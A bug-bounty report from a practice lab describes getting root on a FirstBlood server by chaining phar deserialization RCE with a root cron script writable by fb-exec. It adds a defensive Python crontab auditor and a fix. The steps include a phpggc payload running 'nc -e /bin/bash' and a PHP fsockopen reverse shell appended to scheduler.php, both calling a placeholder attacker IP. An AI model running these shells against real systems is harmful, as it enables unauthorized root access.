FirstBlood-#916 FirstBlood server Rooted!
This issue was discovered on FirstBlood v2



On 2021-10-30, newrouge Level 3 reported:

Hey, I would like to report that it's possible to get the root user on the FirstBlood server, due to some insecure cronjobs being run by the root user that the user fb-exec has write permission over, and a low-privilege user can escalate to root by abusing it.

  • As I mentioned in report (https://www.bugbountyhunter.com/hackevents/report?id=622), it is possible to get RCE due to insecure deserialization by adding the phar:// stream handler to the path of the uploaded proof.

Steps:

  1. Upload a maliciously generated phar file to the server with the payload:

    nc -e /bin/bash <YOUR_IP> <PORT>

    ./phpggc -pj test.jpg -o test.phar monolog/rce1 system "nc -e /bin/bash <ip> <port>"

  2. Upload this file to the server, capture the proof request, and append the phar:// stream wrapper to the path.

  3. Have your listener ready and send the request.

  4. Now let's do some recon: we find another directory inside /app named docker.

  5. Inside it we find that a cronjob is running on the server.

  6. Let's see what that scheduler.php script is.

  7. And the fb-exec user has write permission over that file.

    Uhhh here we go again, Patrice!

  8. Let's put our PHP reverse shell in this scheduler.php file, and start a listener on another port on our local machine:

      echo '$sock=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");' >> scheduler.php

  9. Now wait a moment, and you will get a shell as the root user.

Impact:

  • Firstblooded

Thank you & sorry for the little meme, I hope that's ok :)

Regards newrouge

P1 CRITICAL

FirstBlood ID: 35
Vulnerability Type: RCE

A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the FirstBlood PHP pool user (fb-exec), so anyone who can write it as fb-exec gets code execution as root within a minute. The [checkproof bug] can be combined with this to obtain root privileges.
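The misconfiguration behind both the report's steps 4-9 and the summary above is a root cron job whose target script a non-root user can modify. The following script is an added example written for this page, not FirstBlood's or newrouge's code: it parses a system-format crontab (the /etc/cron.d layout with a user field), resolves which file each root job actually runs (following interpreters such as `php script.php`), and flags targets that are owned by a non-root user or are group- or world-writable. The crontab text, the ownership table and the uid 1001 for fb-exec are constructed for illustration; `real_stat` is what you would plug in on a live host.

```python
"""Audit a system crontab for root jobs whose script a non-root user can modify.

Added example for this page; not FirstBlood's own code. SAMPLE_CRONTAB and
SAMPLE_FILES are constructed, modelled on the setup the report describes.
"""
import os
import pwd
import re
import shlex
import stat

# System crontab line: five time fields or an @keyword, then the user, then the command.
CRON_LINE = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){4}\S+)\s+(\S+)\s+(.+?)\s*$")
# Environment assignments such as SHELL=/bin/sh or MAILTO=root.
ENV_LINE = re.compile(r"^\s*\w+\s*=")
# Shell redirections (>/dev/null, 2>&1, <file) are not arguments of the program.
REDIRECT = re.compile(r"^\d*[<>]")
# Interpreters whose first non-option argument is the script that really runs.
INTERPRETERS = {"php", "python", "python3", "perl", "ruby", "node", "sh", "bash"}


def script_of(command):
    """Return the file a cron command line executes, or None if it cannot be told.

    Only the first simple command is examined; pipelines and 'cd x && y' are not followed.
    """
    try:
        words = shlex.split(command, comments=True)
    except ValueError:  # unbalanced quotes
        return None
    words = [w for w in words if not REDIRECT.match(w)]
    if not words:
        return None
    if os.path.basename(words[0]) in INTERPRETERS:
        args = [w for w in words[1:] if not w.startswith("-")]
        return args[0] if args else None
    return words[0]


def real_stat(path):
    """(uid, permission bits, owner name) of a real file on this host."""
    st = os.stat(path)
    try:
        owner = pwd.getpwuid(st.st_uid).pw_name
    except KeyError:
        owner = str(st.st_uid)
    return st.st_uid, stat.S_IMODE(st.st_mode), owner


def audit_crontab(text, stat_fn=real_stat):
    """Return (line number, script path, reason) for every root job whose script
    is owned by a non-root user or is group- or world-writable."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#") or ENV_LINE.match(line):
            continue
        m = CRON_LINE.match(line)
        if not m or m.group(1) != "root":
            continue
        path = script_of(m.group(2))
        if path is None or not os.path.isabs(path):
            continue  # relative paths depend on cron's working directory; not resolved here
        try:
            uid, mode, owner = stat_fn(path)
        except FileNotFoundError:
            continue
        reasons = []
        if uid != 0:
            reasons.append(f"owned by {owner}")
        if mode & stat.S_IWGRP:
            reasons.append("group-writable")
        if mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if reasons:
            findings.append((lineno, path, ", ".join(reasons)))
    return findings


# Constructed sample in /etc/cron.d format (not the real FirstBlood file).
SAMPLE_CRONTAB = """\
# FirstBlood-style scheduler: constructed for this example
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
* * * * * root php /app/firstblood/scheduler.php >/dev/null 2>&1
0 3 * * * root /usr/local/bin/rotate-logs.sh
*/5 * * * * www-data php /app/firstblood/cleanup.php
@reboot root /usr/local/bin/warm-cache
"""

# Constructed ownership table standing in for os.stat: path -> (uid, mode, owner).
# The uid 1001 for fb-exec is an assumption.
SAMPLE_FILES = {
    "/app/firstblood/scheduler.php": (1001, 0o664, "fb-exec"),  # the report's finding
    "/usr/local/bin/rotate-logs.sh": (0, 0o755, "root"),        # safe
    "/usr/local/bin/warm-cache": (0, 0o775, "root"),            # group-writable
}


def sample_stat(path):
    """stat_fn that reads SAMPLE_FILES instead of the filesystem."""
    if path not in SAMPLE_FILES:
        raise FileNotFoundError(path)
    return SAMPLE_FILES[path]


if __name__ == "__main__":
    for lineno, path, why in audit_crontab(SAMPLE_CRONTAB, sample_stat):
        print(f"line {lineno}: root runs {path}, which is {why}")
```

On a real host, call `audit_crontab(open("/etc/crontab").read())` and the same for each file under /etc/cron.d; the default `real_stat` then consults the filesystem. The check deliberately covers only the script file itself: a writable parent directory (which lets the file be replaced) and writable files that the script includes are separate findings. The fix for the FirstBlood case is either to have scheduler.php owned by root with mode 0644 in a directory fb-exec cannot write, or to run the cron job as fb-exec so that overwriting it gains nothing.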

Report Feedback

@zseano

Creator & Administrator


Nice dog meme! ;)